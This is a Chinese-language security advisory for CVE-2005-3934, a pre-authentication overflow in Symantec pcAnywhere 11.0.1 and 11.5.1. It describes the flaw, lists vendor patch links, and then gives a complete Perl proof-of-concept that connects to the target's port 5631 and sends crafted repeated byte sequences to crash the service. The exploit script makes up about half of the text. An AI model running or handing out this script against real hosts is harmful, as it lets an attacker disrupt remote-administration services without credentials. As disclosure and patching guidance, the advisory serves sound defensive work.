BUGTRAQ ID: 15646
CVE(CAN) ID: CVE-2005-3934
Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。
pcAnywhere在处理特制消息的时候存在溢出漏洞,可能导致拒绝服务。由于溢出发生在认证之前,因此远程攻击者无需有效的凭据便可利用这个漏洞。
Symantec pcAnywhere 11.5.1
Symantec pcAnywhere 11.0.1
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.symantec.com/techsupp/files/pca/index.html” target=“_blank”>http://www.symantec.com/techsupp/files/pca/index.html</a>
<a href=“http://www.symantec.com/techsupp/enterprise/products/spca/files.html” target=“_blank”>http://www.symantec.com/techsupp/enterprise/products/spca/files.html</a>
#!/usr/bin/perl -w
# Version 2.0
#
# PoC for
# pcAnywhere Authentication Denial of Service Vulnerability
# Bugtraq ID: 15646
#
# Tested on pcanywhere v11.0 and v11.0.1
#
# Author: David Maciejak
# Date: 20060117
#
##############################
use IO::Socket;
if (@ARGV<1)
{
die "usage: $0 pcanywhere_ip [port]";
}
$host=$ARGV[0];
$port=$ARGV[1] || 5631;
$|=1;
$cl1="\x00\x00\x00\x00";
$cl2="\x6F\x06\xff";
$cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
$cl4="\x6f\x62\x01\x02\x00\x00\x00";
$sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp'
);
die "Could not create socket: $! \n" unless $sock;
$sock->send($cl1);
$sock->recv($buff,32768);
$sock->send($cl2 x 50);
$sock->recv($buff,32768);
$sock->send($cl3 x 50);
$sock->recv($buff,32768);
$sock->send($cl4);
$sock->recv($buff,32768);
$str='\x06'.'\x04'.'\0xffffffc0'x300;
$sock->send($str x 50);
close $sock;